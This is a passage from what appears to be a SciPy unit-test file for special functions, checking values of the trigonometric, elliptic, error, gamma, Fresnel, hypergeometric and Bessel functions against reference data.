assert_almost_equal(special.cotdg(765), 1.0, 14)
def test_sinc(self):
c = arange(-2,2,.1)
y = special.sinc(c)
yre = sin(pi*c)/(pi*c)
yre[20] = 1.0
assert_array_almost_equal(y, yre, 4)
def test_0(self):
x = 0.0
assert_equal(special.sinc(x),1.0)
def test_sindg(self):
sn = special.sindg(90)
assert_equal(sn,1.0)
def test_sindgmore(self):
snm = special.sindg(30)
snmrl = sin(pi/6.0)
assert_almost_equal(snm,snmrl,8)
snm1 = special.sindg(45)
snmrl1 = sin(pi/4.0)
assert_almost_equal(snm1,snmrl1,8)
class TestTandg(TestCase):
def test_tandg(self):
tn = special.tandg(30)
tnrl = tan(pi/6.0)
assert_almost_equal(tn,tnrl,8)
def test_tandgmore(self):
tnm = special.tandg(45)
tnmrl = tan(pi/4.0)
assert_almost_equal(tnm,tnmrl,8)
tnm1 = special.tandg(60)
tnmrl1 = tan(pi/3.0)
assert_almost_equal(tnm1,tnmrl1,8)
def test_specialpoints(self):
assert_almost_equal(special.tandg(0), 0.0, 14)
assert_almost_equal(special.tandg(45), 1.0, 14)
assert_almost_equal(special.tandg(-45), -1.0, 14)
assert_almost_equal(special.tandg(135), -1.0, 14)
assert_almost_equal(special.tandg(-135), 1.0, 14)
assert_almost_equal(special.tandg(180), 0.0, 14)
assert_almost_equal(special.tandg(-180), 0.0, 14)
assert_almost_equal(special.tandg(225), 1.0, 14)
assert_almost_equal(special.tandg(-225), -1.0, 14)
assert_almost_equal(special.tandg(315), -1.0, 14)
assert_almost_equal(special.tandg(-315), 1.0, 14)
class TestEllip(TestCase):
def test_ellipj_nan(self):
"""Regression test for #912."""
special.ellipj(0.5, np.nan)
def test_ellipj(self):
el = special.ellipj(0.2,0)
rel = [sin(0.2),cos(0.2),1.0,0.20]
assert_array_almost_equal(el,rel,13)
def test_ellipk(self):
elk = special.ellipk(.2)
assert_almost_equal(elk,1.659623598610528,11)
def test_ellipkinc(self):
elkinc = special.ellipkinc(pi/2,.2)
elk = special.ellipk(0.2)
assert_almost_equal(elkinc,elk,15)
alpha = 20*pi/180
phi = 45*pi/180
m = sin(alpha)**2
elkinc = special.ellipkinc(phi,m)
assert_almost_equal(elkinc,0.79398143,8)
# From pg. 614 of A & S
def test_ellipe(self):
ele = special.ellipe(.2)
assert_almost_equal(ele,1.4890350580958529,8)
def test_ellipeinc(self):
eleinc = special.ellipeinc(pi/2,.2)
ele = special.ellipe(0.2)
assert_almost_equal(eleinc,ele,14)
# pg 617 of A & S
alpha, phi = 52*pi/180,35*pi/180
m = sin(alpha)**2
eleinc = special.ellipeinc(phi,m)
assert_almost_equal(eleinc, 0.58823065, 8)
class TestErf(TestCase):
def test_erf(self):
er = special.erf(.25)
assert_almost_equal(er,0.2763263902,8)
def test_erf_zeros(self):
erz = special.erf_zeros(5)
erzr= array([1.45061616+1.88094300j,
2.24465928+2.61657514j,
2.83974105+3.17562810j,
3.33546074+3.64617438j,
3.76900557+4.06069723j])
assert_array_almost_equal(erz,erzr,4)
def test_erfcinv(self):
i = special.erfcinv(1)
assert_equal(i,0)
def test_erfinv(self):
i = special.erfinv(0)
assert_equal(i,0)
def test_errprint(self):
a = special.errprint()
b = 1-a #a is the state 1-a inverts state
c = special.errprint(b) #returns last state 'a'
assert_equal(a,c)
d = special.errprint(a) #returns to original state
assert_equal(d,b) #makes sure state was returned
#assert_equal(d,1-a)
class TestEuler(TestCase):
def test_euler(self):
eu0 = special.euler(0)
eu1 = special.euler(1)
eu2 = special.euler(2) # just checking segfaults
assert_almost_equal(eu0[0],1,8)
assert_almost_equal(eu2[2],-1,8)
eu24 = special.euler(24)
mathworld = [1,1,5,61,1385,50521,2702765,199360981,
19391512145l,2404879675441l,
370371188237525l,69348874393137901l,
15514534163557086905l]
correct = zeros((25,),'d')
for k in range(0,13):
if (k % 2):
correct[2*k] = -float(mathworld[k])
else:
correct[2*k] = float(mathworld[k])
olderr = np.seterr(all='ignore')
try:
err = nan_to_num((eu24-correct)/correct)
errmax = max(err)
finally:
np.seterr(**olderr)
assert_almost_equal(errmax, 0.0, 14)
class TestExp(TestCase):
def test_exp2(self):
ex = special.exp2(2)
exrl = 2**2
assert_equal(ex,exrl)
def test_exp2more(self):
exm = special.exp2(2.5)
exmrl = 2**(2.5)
assert_almost_equal(exm,exmrl,8)
def test_exp10(self):
ex = special.exp10(2)
exrl = 10**2
assert_approx_equal(ex,exrl)
def test_exp10more(self):
exm = special.exp10(2.5)
exmrl = 10**(2.5)
assert_almost_equal(exm,exmrl,8)
def test_expm1(self):
ex = (special.expm1(2),special.expm1(3),special.expm1(4))
exrl = (exp(2)-1,exp(3)-1,exp(4)-1)
assert_array_almost_equal(ex,exrl,8)
def test_expm1more(self):
ex1 = (special.expm1(2),special.expm1(2.1),special.expm1(2.2))
exrl1 = (exp(2)-1,exp(2.1)-1,exp(2.2)-1)
assert_array_almost_equal(ex1,exrl1,8)
class TestFresnel(TestCase):
def test_fresnel(self):
frs = array(special.fresnel(.5))
assert_array_almost_equal(frs,array([0.064732432859999287, 0.49234422587144644]),8)
# values from pg 329 Table 7.11 of A & S
# slightly corrected in 4th decimal place
def test_fresnel_zeros(self):
szo, czo = special.fresnel_zeros(5)
assert_array_almost_equal(szo,
array([ 2.0093+0.2885j,
2.8335+0.2443j,
3.4675+0.2185j,
4.0026+0.2009j,
4.4742+0.1877j]),3)
assert_array_almost_equal(czo,
array([ 1.7437+0.3057j,
2.6515+0.2529j,
3.3204+0.2240j,
3.8757+0.2047j,
4.3611+0.1907j]),3)
vals1 = special.fresnel(szo)[0]
vals2 = special.fresnel(czo)[1]
assert_array_almost_equal(vals1,0,14)
assert_array_almost_equal(vals2,0,14)
def test_fresnelc_zeros(self):
szo, czo = special.fresnel_zeros(6)
frc = special.fresnelc_zeros(6)
assert_array_almost_equal(frc,czo,12)
def test_fresnels_zeros(self):
szo, czo = special.fresnel_zeros(5)
frs = special.fresnels_zeros(5)
assert_array_almost_equal(frs,szo,12)
class TestGamma(TestCase):
def test_gamma(self):
gam = special.gamma(5)
assert_equal(gam,24.0)
def test_gammaln(self):
gamln = special.gammaln(3)
lngam = log(special.gamma(3))
assert_almost_equal(gamln,lngam,8)
def test_gammainc(self):
gama = special.gammainc(.5,.5)
assert_almost_equal(gama,.7,1)
def test_gammaincc(self):
gicc = special.gammaincc(.5,.5)
greal = 1 - special.gammainc(.5,.5)
assert_almost_equal(gicc,greal,8)
def test_gammainccinv(self):
gccinv = special.gammainccinv(.5,.5)
gcinv = special.gammaincinv(.5,.5)
assert_almost_equal(gccinv,gcinv,8)
@with_special_errors
def test_gammaincinv(self):
y = special.gammaincinv(.4,.4)
x = special.gammainc(.4,y)
assert_almost_equal(x,0.4,1)
y = special.gammainc(10, 0.05)
x = special.gammaincinv(10, 2.5715803516000736e-20)
assert_almost_equal(0.05, x, decimal=10)
assert_almost_equal(y, 2.5715803516000736e-20, decimal=10)
x = special.gammaincinv(50, 8.20754777388471303050299243573393e-18)
assert_almost_equal(11.0, x, decimal=10)
@with_special_errors
def test_975(self):
# Regression test for ticket #975 -- switch point in algorithm
# check that things work OK at the point, immediately next floats
# around it, and a bit further away
pts = [0.25,
np.nextafter(0.25, 0), 0.25 - 1e-12,
np.nextafter(0.25, 1), 0.25 + 1e-12]
for xp in pts:
y = special.gammaincinv(.4, xp)
x = special.gammainc(0.4, y)
assert_tol_equal(x, xp, rtol=1e-12)
def test_rgamma(self):
rgam = special.rgamma(8)
rlgam = 1/special.gamma(8)
assert_almost_equal(rgam,rlgam,8)
class TestHankel(TestCase):
def test_negv1(self):
assert_almost_equal(special.hankel1(-3,2), -special.hankel1(3,2), 14)
def test_hankel1(self):
hank1 = special.hankel1(1,.1)
hankrl = (special.jv(1,.1) + special.yv(1,.1)*1j)
assert_almost_equal(hank1,hankrl,8)
def test_negv1e(self):
assert_almost_equal(special.hankel1e(-3,2), -special.hankel1e(3,2), 14)
def test_hankel1e(self):
hank1e = special.hankel1e(1,.1)
hankrle = special.hankel1(1,.1)*exp(-.1j)
assert_almost_equal(hank1e,hankrle,8)
def test_negv2(self):
assert_almost_equal(special.hankel2(-3,2), -special.hankel2(3,2), 14)
def test_hankel2(self):
hank2 = special.hankel2(1,.1)
hankrl2 = (special.jv(1,.1) - special.yv(1,.1)*1j)
assert_almost_equal(hank2,hankrl2,8)
def test_neg2e(self):
assert_almost_equal(special.hankel2e(-3,2), -special.hankel2e(3,2), 14)
def test_hankl2e(self):
hank2e = special.hankel2e(1,.1)
hankrl2e = special.hankel2e(1,.1)
assert_almost_equal(hank2e,hankrl2e,8)
class TestHyper(TestCase):
def test_h1vp(self):
h1 = special.h1vp(1,.1)
h1real = (special.jvp(1,.1) + special.yvp(1,.1)*1j)
assert_almost_equal(h1,h1real,8)
def test_h2vp(self):
h2 = special.h2vp(1,.1)
h2real = (special.jvp(1,.1) - special.yvp(1,.1)*1j)
assert_almost_equal(h2,h2real,8)
def test_hyp0f1(self):
pass
def test_hyp1f1(self):
hyp1 = special.hyp1f1(.1,.1,.3)
assert_almost_equal(hyp1, 1.3498588075760032,7)
# test contributed by Moritz Deger (2008-05-29)
# http://projects.scipy.org/scipy/scipy/ticket/659
# reference data obtained from mathematica [ a, b, x, m(a,b,x)]:
# produced with test_hyp1f1.nb
ref_data = array([[ -8.38132975e+00, -1.28436461e+01, -2.91081397e+01, 1.04178330e+04],
[ 2.91076882e+00, -6.35234333e+00, -1.27083993e+01, 6.68132725e+00],
[ -1.42938258e+01, 1.80869131e-01, 1.90038728e+01, 1.01385897e+05],
[ 5.84069088e+00, 1.33187908e+01, 2.91290106e+01, 1.59469411e+08],
[ -2.70433202e+01, -1.16274873e+01, -2.89582384e+01, 1.39900152e+24],
[ 4.26344966e+00, -2.32701773e+01, 1.91635759e+01, 6.13816915e+21],
[ 1.20514340e+01, -3.40260240e+00, 7.26832235e+00, 1.17696112e+13],
[ 2.77372955e+01, -1.99424687e+00, 3.61332246e+00, 3.07419615e+13],
[ 1.50310939e+01, -2.91198675e+01, -1.53581080e+01, -3.79166033e+02],
[ 1.43995827e+01, 9.84311196e+00, 1.93204553e+01, 2.55836264e+10],
[ -4.08759686e+00, 1.34437025e+01, -1.42072843e+01, 1.70778449e+01],
[ 8.05595738e+00, -1.31019838e+01, 1.52180721e+01, 3.06233294e+21],
[ 1.81815804e+01, -1.42908793e+01, 9.57868793e+00, -2.84771348e+20],
[ -2.49671396e+01, 1.25082843e+01, -1.71562286e+01, 2.36290426e+07],
[ 2.67277673e+01, 1.70315414e+01, 6.12701450e+00, 7.77917232e+03],
[ 2.49565476e+01, 2.91694684e+01, 6.29622660e+00, 2.35300027e+02],
[ 6.11924542e+00, -1.59943768e+00, 9.57009289e+00, 1.32906326e+11],
[ -1.47863653e+01, 2.41691301e+01, -1.89981821e+01, 2.73064953e+03],
[ 2.24070483e+01, -2.93647433e+00, 8.19281432e+00, -6.42000372e+17],
[ 8.04042600e-01, 1.82710085e+01, -1.97814534e+01, 5.48372441e-01],
[ 1.39590390e+01, 1.97318686e+01, 2.37606635e+00, 5.51923681e+00],
[ -4.66640483e+00, -2.00237930e+01, 7.40365095e+00, 4.50310752e+00],
[ 2.76821999e+01, -6.36563968e+00, 1.11533984e+01, -9.28725179e+23],
[ -2.56764457e+01, 1.24544906e+00, 1.06407572e+01, 1.25922076e+01],
[ 3.20447808e+00, 1.30874383e+01, 2.26098014e+01, 2.03202059e+04],
[ -1.24809647e+01, 4.15137113e+00, -2.92265700e+01, 2.39621411e+08],
[ 2.14778108e+01, -2.35162960e+00, -1.13758664e+01, 4.46882152e-01],
[ -9.85469168e+00, -3.28157680e+00, 1.67447548e+01, -1.07342390e+07],
[ 1.08122310e+01, -2.47353236e+01, -1.15622349e+01, -2.91733796e+03],
[ -2.67933347e+01, -3.39100709e+00, 2.56006986e+01, -5.29275382e+09],
[ -8.60066776e+00, -8.02200924e+00, 1.07231926e+01, 1.33548320e+06],
[ -1.01724238e-01, -1.18479709e+01, -2.55407104e+01, 1.55436570e+00],
[ -3.93356771e+00, 2.11106818e+01, -2.57598485e+01, 2.13467840e+01],
[ 3.74750503e+00, 1.55687633e+01, -2.92841720e+01, 1.43873509e-02],
[ 6.99726781e+00, 2.69855571e+01, -1.63707771e+01, 3.08098673e-02],
[ -2.31996011e+01, 3.47631054e+00, 9.75119815e-01, 1.79971073e-02],
[ 2.38951044e+01, -2.91460190e+01, -2.50774708e+00, 9.56934814e+00],
[ 1.52730825e+01, 5.77062507e+00, 1.21922003e+01, 1.32345307e+09],
[ 1.74673917e+01, 1.89723426e+01, 4.94903250e+00, 9.90859484e+01],
[ 1.88971241e+01, 2.86255413e+01, 5.52360109e-01, 1.44165360e+00],
[ 1.02002319e+01, -1.66855152e+01, -2.55426235e+01, 6.56481554e+02],
[ -1.79474153e+01, 1.22210200e+01, -1.84058212e+01, 8.24041812e+05],
[ -1.36147103e+01, 1.32365492e+00, -7.22375200e+00, 9.92446491e+05],
[ 7.57407832e+00, 2.59738234e+01, -1.34139168e+01, 3.64037761e-02],
[ 2.21110169e+00, 1.28012666e+01, 1.62529102e+01, 1.33433085e+02],
[ -2.64297569e+01, -1.63176658e+01, -1.11642006e+01, -2.44797251e+13],
[ -2.46622944e+01, -3.02147372e+00, 8.29159315e+00, -3.21799070e+05],
[ -1.37215095e+01, -1.96680183e+01, 2.91940118e+01, 3.21457520e+12],
[ -5.45566105e+00, 2.81292086e+01, 1.72548215e-01, 9.66973000e-01],
[ -1.55751298e+00, -8.65703373e+00, 2.68622026e+01, -3.17190834e+16],
[ 2.45393609e+01, -2.70571903e+01, 1.96815505e+01, 1.80708004e+37],
[ 5.77482829e+00, 1.53203143e+01, 2.50534322e+01, 1.14304242e+06],
[ -1.02626819e+01, 2.36887658e+01, -2.32152102e+01, 7.28965646e+02],
[ -1.30833446e+00, -1.28310210e+01, 1.87275544e+01, -9.33487904e+12],
[ 5.83024676e+00, -1.49279672e+01, 2.44957538e+01, -7.61083070e+27],
[ -2.03130747e+01, 2.59641715e+01, -2.06174328e+01, 4.54744859e+04],
[ 1.97684551e+01, -2.21410519e+01, -2.26728740e+01, 3.53113026e+06],
[ 2.73673444e+01, 2.64491725e+01, 1.57599882e+01, 1.07385118e+07],
[ 5.73287971e+00, 1.21111904e+01, 1.33080171e+01, 2.63220467e+03],
[ -2.82751072e+01, 2.08605881e+01, 9.09838900e+00, -6.60957033e-07],
[ 1.87270691e+01, -1.74437016e+01, 1.52413599e+01, 6.59572851e+27],
[ 6.60681457e+00, -2.69449855e+00, 9.78972047e+00, -2.38587870e+12],
[ 1.20895561e+01, -2.51355765e+01, 2.30096101e+01, 7.58739886e+32],
[ -2.44682278e+01, 2.10673441e+01, -1.36705538e+01, 4.54213550e+04],
[ -4.50665152e+00, 3.72292059e+00, -4.83403707e+00, 2.68938214e+01],
[ -7.46540049e+00, -1.08422222e+01, -1.72203805e+01, -2.09402162e+02],
[ -2.00307551e+01, -7.50604431e+00, -2.78640020e+01, 4.15985444e+19],
[ 1.99890876e+01, 2.20677419e+01, -2.51301778e+01, 1.23840297e-09],
[ 2.03183823e+01, -7.66942559e+00, 2.10340070e+01, 1.46285095e+31],
[ -2.90315825e+00, -2.55785967e+01, -9.58779316e+00, 2.65714264e-01],
[ 2.73960829e+01, -1.80097203e+01, -2.03070131e+00, 2.52908999e+02],
[ -2.11708058e+01, -2.70304032e+01, 2.48257944e+01, 3.09027527e+08],
[ 2.21959758e+01, 4.00258675e+00, -1.62853977e+01, -9.16280090e-09],
[ 1.61661840e+01, -2.26845150e+01, 2.17226940e+01, -8.24774394e+33],
[ -3.35030306e+00, 1.32670581e+00, 9.39711214e+00, -1.47303163e+01],
[ 7.23720726e+00, -2.29763909e+01, 2.34709682e+01, -9.20711735e+29],
[ 2.71013568e+01, 1.61951087e+01, -7.11388906e-01, 2.98750911e-01],
[ 8.40057933e+00, -7.49665220e+00, 2.95587388e+01, 6.59465635e+29],
[ -1.51603423e+01, 1.94032322e+01, -7.60044357e+00, 1.05186941e+02],
[ -8.83788031e+00, -2.72018313e+01, 1.88269907e+00, 1.81687019e+00],
[ -1.87283712e+01, 5.87479570e+00, -1.91210203e+01, 2.52235612e+08],
[ -5.61338513e-01, 2.69490237e+01, 1.16660111e-01, 9.97567783e-01],
[ -5.44354025e+00, -1.26721408e+01, -4.66831036e+00, 1.06660735e-01],
[ -2.18846497e+00, 2.33299566e+01, 9.62564397e+00, 3.03842061e-01],
[ 6.65661299e+00, -2.39048713e+01, 1.04191807e+01, 4.73700451e+13],
[ -2.57298921e+01, -2.60811296e+01, 2.74398110e+01, -5.32566307e+11],
[ -1.11431826e+01, -1.59420160e+01, -1.84880553e+01, -1.01514747e+02],
[ 6.50301931e+00, 2.59859051e+01, -2.33270137e+01, 1.22760500e-02],
[ -1.94987891e+01, -2.62123262e+01, 3.90323225e+00, 1.71658894e+01],
[ 7.26164601e+00, -1.41469402e+01, 2.81499763e+01, -2.50068329e+31],
[ -1.52424040e+01, 2.99719005e+01, -2.85753678e+01, 1.31906693e+04],
[ 5.24149291e+00, -1.72807223e+01, 2.22129493e+01, 2.50748475e+25],
[ 3.63207230e-01, -9.54120862e-02, -2.83874044e+01, 9.43854939e-01],
[ -2.11326457e+00, -1.25707023e+01, 1.17172130e+00, 1.20812698e+00],
[ 2.48513582e+00, 1.03652647e+01, -1.84625148e+01, 6.47910997e-02],
[ 2.65395942e+01, 2.74794672e+01, 1.29413428e+01, 2.89306132e+05],
[ -9.49445460e+00, 1.59930921e+01, -1.49596331e+01, 3.27574841e+02],
[ -5.89173945e+00, 9.96742426e+00, 2.60318889e+01, -3.15842908e-01],
[ -1.15387239e+01, -2.21433107e+01, -2.17686413e+01, 1.56724718e-01],
[ -5.30592244e+00, -2.42752190e+01, 1.29734035e+00, 1.31985534e+00]])
for a,b,c,expected in ref_data:
result = special.hyp1f1(a,b,c)
assert_(abs(expected - result)/expected < 1e-4)
def test_hyp1f2(self):
pass
def test_hyp2f0(self):
pass
def test_hyp2f1(self):
# a collection of special cases taken from AMS 55
values = [[0.5, 1, 1.5, 0.2**2, 0.5/0.2*log((1+0.2)/(1-0.2))],
[0.5, 1, 1.5, -0.2**2, 1./0.2*arctan(0.2)],
[1, 1, 2, 0.2, -1/0.2*log(1-0.2)],
[3, 3.5, 1.5, 0.2**2,
0.5/0.2/(-5)*((1+0.2)**(-5)-(1-0.2)**(-5))],
[-3, 3, 0.5, sin(0.2)**2, cos(2*3*0.2)],
[3, 4, 8, 1, special.gamma(8)*special.gamma(8-4-3)/special.gamma(8-3)/special.gamma(8-4)],
[3, 2, 3-2+1, -1, 1./2**3*sqrt(pi)*
special.gamma(1+3-2)/special.gamma(1+0.5*3-2)/special.gamma(0.5+0.5*3)],
[5, 2, 5-2+1, -1, 1./2**5*sqrt(pi)*
special.gamma(1+5-2)/special.gamma(1+0.5*5-2)/special.gamma(0.5+0.5*5)],
[4, 0.5+4, 1.5-2*4, -1./3, (8./9)**(-2*4)*special.gamma(4./3)*
special.gamma(1.5-2*4)/special.gamma(3./2)/special.gamma(4./3-2*4)],
# and some others
# ticket #424
[1.5, -0.5, 1.0, -10.0, 4.1300097765277476484],
# negative integer a or b, with c-a-b integer and x > 0.9
[-2,3,1,0.95,0.715],
[2,-3,1,0.95,-0.007],
[-6,3,1,0.95,0.0000810625],
[2,-5,1,0.95,-0.000029375],
# huge negative integers
(10, -900, 10.5, 0.99, 1.91853705796607664803709475658e-24),
(10, -900, -10.5, 0.99, 3.54279200040355710199058559155e-18),
]
for i, (a, b, c, x, v) in enumerate(values):
cv = special.hyp2f1(a, b, c, x)
assert_almost_equal(cv, v, 8, err_msg='test #%d' % i)
def test_hyp3f0(self):
pass
def test_hyperu(self):
val1 = special.hyperu(1,0.1,100)
assert_almost_equal(val1,0.0098153,7)
a,b = [0.3,0.6,1.2,-2.7],[1.5,3.2,-0.4,-3.2]
a,b = asarray(a), asarray(b)
z = 0.5
hypu = special.hyperu(a,b,z)
hprl = (pi/sin(pi*b))*(special.hyp1f1(a,b,z)/ \
(special.gamma(1+a-b)*special.gamma(b))- \
z**(1-b)*special.hyp1f1(1+a-b,2-b,z) \
/(special.gamma(a)*special.gamma(2-b)))
assert_array_almost_equal(hypu,hprl,12)
class TestBessel(TestCase):
def test_itj0y0(self):
it0 = array(special.itj0y0(.2))
assert_array_almost_equal(it0,array([0.19933433254006822, -0.34570883800412566]),8)
def test_it2j0y0(self):
it2 = array(special.it2j0y0(.2))
assert_array_almost_equal(it2,array([0.0049937546274601858, -0.43423067011231614]),8)
def test_negv_iv(self):
assert_equal(special.iv(3,2), special.iv(-3,2))
def test_j0(self):
oz = special.j0(.1)
ozr = special.jn(0,.1)
assert_almost_equal(oz,ozr,8)
def test_j1(self):
o1 = special.j1(.1)
o1r = special.jn(1,.1)
assert_almost_equal(o1,o1r,8)
def test_jn(self):
jnnr = special.jn(1,.2)
assert_almost_equal(jnnr,0.099500832639235995,8)
def test_negv_jv(self):
assert_almost_equal(special.jv(-3,2), -special.jv(3,2), 14)
def test_jv(self):
values = [[0, 0.1, 0.99750156206604002],
[2./3, 1e-8, 0.3239028506761532e-5],
[2./3, 1e-10, 0.1503423854873779e-6],
[3.1, 1e-10, 0.1711956265409013e-32],
[2./3, 4.0, -0.2325440850267039],
]
for i, (v, x, y) in enumerate(values):
yc = special.jv(v, x)
assert_almost_equal(yc, y, 8, err_msg='test #%d' % i)
def test_negv_jve(self):
assert_almost_equal(special.jve(-3,2), -special.jve(3,2), 14)
def test_jve(self):
jvexp = special.jve(1,.2)
assert_almost_equal(jvexp,0.099500832639235995,8)
jvexp1 = special.jve(1,.2+1j)
z = .2+1j
jvexpr = special.jv(1,z)*exp(-abs(z.imag))
assert_almost_equal(jvexp1,jvexpr,8)
def test_jn_zeros(self):
jn0 = special.jn_zeros(0,5)
jn1 = special.jn_zeros(1,5)
assert_array_almost_equal(jn0,array([ 2.4048255577,
5.5200781103,
8.6537279129,
11.7915344391,
14.9309177086]),4)
assert_array_almost_equal(jn1,array([ 3.83171,
7.01559,
10.17347,
13.32369,
16.47063]),4)
jn102 = special.jn_zeros(102,5)
assert_tol_equal(jn102, array([110.89174935992040343,
117.83464175788308398,
123.70194191713507279,
129.02417238949092824,
134.00114761868422559]), rtol=1e-13)
jn301 = special.jn_zeros(301,5)
assert_tol_equal(jn301, array([313.59097866698830153,
323.21549776096288280,
331.22338738656748796,
338.39676338872084500,
345.03284233056064157]), rtol=1e-13)
def test_jn_zeros_slow(self):
jn0 = special.jn_zeros(0, 300)
assert_tol_equal(jn0[260-1], 816.02884495068867280, rtol=1e-13)
assert_tol_equal(jn0[280-1], 878.86068707124422606, rtol=1e-13)
assert_tol_equal(jn0[300-1], 941.69253065317954064, rtol=1e-13)
jn10 = special.jn_zeros(10, 300)
assert_tol_equal(jn10[260-1], 831.67668514305631151, rtol=1e-13)
assert_tol_equal(jn10[280-1], 894.51275095371316931, rtol=1e-13)
assert_tol_equal(jn10[300-1], 957.34826370866539775, rtol=1e-13)
jn3010 = special.jn_zeros(3010,5)
assert_tol_equal(jn3010, array([3036.86590780927,
3057.06598526482,
3073.66360690272,
3088.37736494778,
3101.86438139042]), rtol=1e-8)
def test_jnjnp_zeros(self):
jn = special.jn
def jnp(n, x):
return (jn(n-1,x) - jn(n+1,x))/2
for nt in range(1, 30):
z, n, m, t = special.jnjnp_zeros(nt)
for zz, nn, tt in zip(z, n, t):
if tt == 0:
assert_allclose(jn(nn, zz), 0, atol=1e-6)
elif tt == 1:
assert_allclose(jnp(nn, zz), 0, atol=1e-6)
else:
raise AssertionError("Invalid t return for nt=%d" % nt)
def test_jnp_zeros(self):
jnp = special.jnp_zeros(1,5)
assert_array_almost_equal(jnp, array([ 1.84118,
5.33144,
8.53632,
11.70600,
14.86359]),4)
jnp = special.jnp_zeros(443,5)
assert_tol_equal(special.jvp(443, jnp), 0, atol=1e-15)
def test_jnyn_zeros(self):
jnz = special.jnyn_zeros(1,5)
assert_array_almost_equal(jnz,(array([ 3.83171,
7.01559,
10.17347,
13.32369,
16.47063]),
array([ 1.84118,
5.33144,
8.53632,
11.70600,
14.86359]),
array([ 2.19714,
5.42968,
8.59601,
11.74915,
14.89744]),
array([ 3.68302,
6.94150,
10.12340,
13.28576,
16.44006])),5)
def test_jvp(self):
jvprim = special.jvp(2,2)
jv0 = (special.jv(1,2)-special.jv(3,2))/2
assert_almost_equal(jvprim,jv0,10)
def test_k0(self):
ozk = special.k0(.1)
ozkr = special.kv(0,.1)
assert_almost_equal(ozk,ozkr,8)
def test_k0e(self):
ozke = special.k0e(.1)
ozker = special.kve(0,.1)
assert_almost_equal(ozke,ozker,8)
def test_k1(self):
o1k = special.k1(.1)
o1kr = special.kv(1,.1)
assert_almost_equal(o1k,o1kr,8)
def test_k1e(self):
o1ke = special.k1e(.1)
o1ker = special.kve(1,.1)
assert_almost_equal(o1ke,o1ker,8)
def test_jacobi(self):
a = 5*rand() - 1
b = 5*rand() - 1
P0 = special.jacobi(0,a,b)
P1 = special.jacobi(1,a,b)
P2 = special.jacobi(2,a,b)
P3 = special.jacobi(3,a,b)
assert_array_almost_equal(P0.c,[1],13)
assert_array_almost_equal(P1.c,array([a+b+2,a-b])/2.0,13)
cp = [(a+b+3)*(a+b+4), 4*(a+b+3)*(a+2), 4*(a+1)*(a+2)]
p2c = [cp[0],cp[1]-2*cp[0],cp[2]-cp[1]+cp[0]]
assert_array_almost_equal(P2.c,array(p2c)/8.0,13)
cp = [(a+b+4)*(a+b+5)*(a+b+6),6*(a+b+4)*(a+b+5)*(a+3),
12*(a+b+4)*(a+2)*(a+3),8*(a+1)*(a+2)*(a+3)]
p3c = [cp[0],cp[1]-3*cp[0],cp[2]-2*cp[1]+3*cp[0],cp[3]-cp[2]+cp[1]-cp[0]]
assert_array_almost_equal(P3.c,array(p3c)/48.0,13)
def test_kn(self):
kn1 = special.kn(0,.2)
assert_almost_equal(kn1,1.7527038555281462,8)
def test_negv_kv(self):
assert_equal(special.kv(3.0, 2.2), special.kv(-3.0, 2.2))
def test_kv0(self):
kv0 = special.kv(0,.2)
assert_almost_equal(kv0, 1.7527038555281462, 10)
def test_kv1(self):
kv1 = special.kv(1,0.2)
assert_almost_equal(kv1, 4.775972543220472, 10)
def test_kv2(self):
kv2 = special.kv(2,0.2)
assert_almost_equal(kv2, 49.51242928773287, 10)
def test_negv_kve(self):
assert_equal(special.kve(3.0, 2.2), special.kve(-3.0, 2.2))
def test_kve(self):
kve1 = special.kve(0,.2)
kv1 = special.kv(0,.2)*exp(.2)
assert_almost_equal(kve1,kv1,8)
z = .2+1j
kve2 = special.kve(0,z)
kv2 = special.kv(0,z)*exp(z)
assert_almost_equal(kve2,kv2,8)
def test_kvp_v0n1(self):
z = 2.2
assert_almost_equal(-special.kv(1,z), special.kvp(0,z, n=1), 10)
def test_kvp_n1(self):
v = 3.
z = 2.2
xc = -special.kv(v+1,z) + v/z*special.kv(v,z)
x = special.kvp(v,z, n=1)
assert_almost_equal(xc, x, 10) #this function (kvp) is broken
def test_kvp_n2(self):
v = 3.
z = 2.2
xc = (z**2+v**2-v)/z**2 * special.kv(v,z) + special.kv(v+1,z)/z
x = special.kvp(v, z, n=2)
assert_almost_equal(xc, x, 10)
def test_y0(self):
oz = special.y0(.1)
ozr = special.yn(0,.1)
assert_almost_equal(oz,ozr,8)
def test_y1(self):
o1 = special.y1(.1)
o1r = special.yn(1,.1)
assert_almost_equal(o1,o1r,8)
def test_y0_zeros(self):
yo,ypo = special.y0_zeros(2)
zo,zpo = special.y0_zeros(2,complex=1)
all = r_[yo,zo]
allval = r_[ypo,zpo]
assert_array_almost_equal(abs(special.yv(0.0,all)),0.0,11)
assert_array_almost_equal(abs(special.yv(1,all)-allval),0.0,11)
def test_y1_zeros(self):
y1 = special.y1_zeros(1)
assert_array_almost_equal(y1,(array([2.19714]),array([0.52079])),5)
def test_y1p_zeros(self):
y1p = special.y1p_zeros(1,complex=1)
assert_array_almost_equal(y1p,(array([ 0.5768+0.904j]), array([-0.7635+0.5892j])),3)
def test_yn_zeros(self):
an = special.yn_zeros(4,2)
assert_array_almost_equal(an,array([ 5.64515, 9.36162]),5)
an = special.yn_zeros(443,5)
assert_tol_equal(an, [450.13573091578090314, 463.05692376675001542,
472.80651546418663566, 481.27353184725625838,
488.98055964441374646], rtol=1e-15)
def test_ynp_zeros(self):
ao = special.ynp_zeros(0,2)
assert_array_almost_equal(ao,array([ 2.19714133, 5.42968104]),6)
ao = special.ynp_zeros(43,5)
assert_tol_equal(special.yvp(43, ao), 0, atol=1e-15)
ao = special.ynp_zeros(443,5)
assert_tol_equal(special.yvp(443, ao), 0, atol=1e-9)
@dec.knownfailureif(True,
"cephes/yv is not eps accurate for large orders on "
"all platforms, and has nan/inf issues")
def test_ynp_zeros_large_order(self):
ao = special.ynp_zeros(443,5)
assert_tol_equal(special.yvp(443, ao), 0, atol=1e-15)
def test_yn(self):
yn2n = special.yn(1,.2)
assert_almost_equal(yn2n,-3.3238249881118471,8)
def test_negv_yv(self):
assert_almost_equal(special.yv(-3,2), -special.yv(3,2), 14)
def test_yv(self):
yv2 = special.yv(1,.2)
assert_almost_equal(yv2,-3.3238249881118471,8)
def test_negv_yve(self):
assert_almost_equal(special.yve(-3,2), -special.yve(3,2), 14)
def test_yve(self):
yve2 = special.yve(1,.2)
assert_almost_equal(yve2,-3.3238249881118471,8)
yve2r = special.yv(1,.2+1j)*exp(-1)
yve22 = special.yve(1,.2+1j)
assert_almost_equal(yve22,yve2r,8)
def test_yvp(self):
yvpr = (special.yv(1,.2) - special.yv(3,.2))/2.0
yvp1 = special.yvp(2,.2)
assert_array_almost_equal(yvp1,yvpr,10)
